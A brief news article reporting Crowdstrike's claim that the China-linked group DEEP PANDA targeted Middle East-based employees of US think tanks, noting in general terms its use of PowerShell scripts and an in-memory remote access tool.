A nebulous group nicknamed "DEEP PANDA" by security researchers is said to be behind a targeted hack of Middle East-based employees of US think tanks.
According to a Crowdstrike blog post, the attacks happened as the situation in Iraq and the Middle East took a turn for the worse. It highlights June 18 as the date the individual attacks started as ISIS attacked the Balji Oil refinery.
The company's co-founder and CTO, Dmitri Alperovitch, claims that DEEP PANDA has ties with the Chinese government (calling it a nation-state cyber intrusion group) and that the shift of direction is a clear indication that China is keen to know what other parties involved in the region are likely to do.
Crowdstrike says that DEEP PANDA uses powershell scripts to fool any traditional security application that may reside on the victim's computer.
They then inject the MadHatter .NET Remote Access Tool, a RAT that runs from the system's memory and doesn't need to be initalled on the system's drive.
According to Alperovitch, DEEP PANDA "presents a very serious threat not just to think tanks, but also multinational financial institutions, law firms, defense contractors, and government agencies" and that the renewed interest on cash-strapped, well-connected not-for-profit organisations can only be a worrying sign.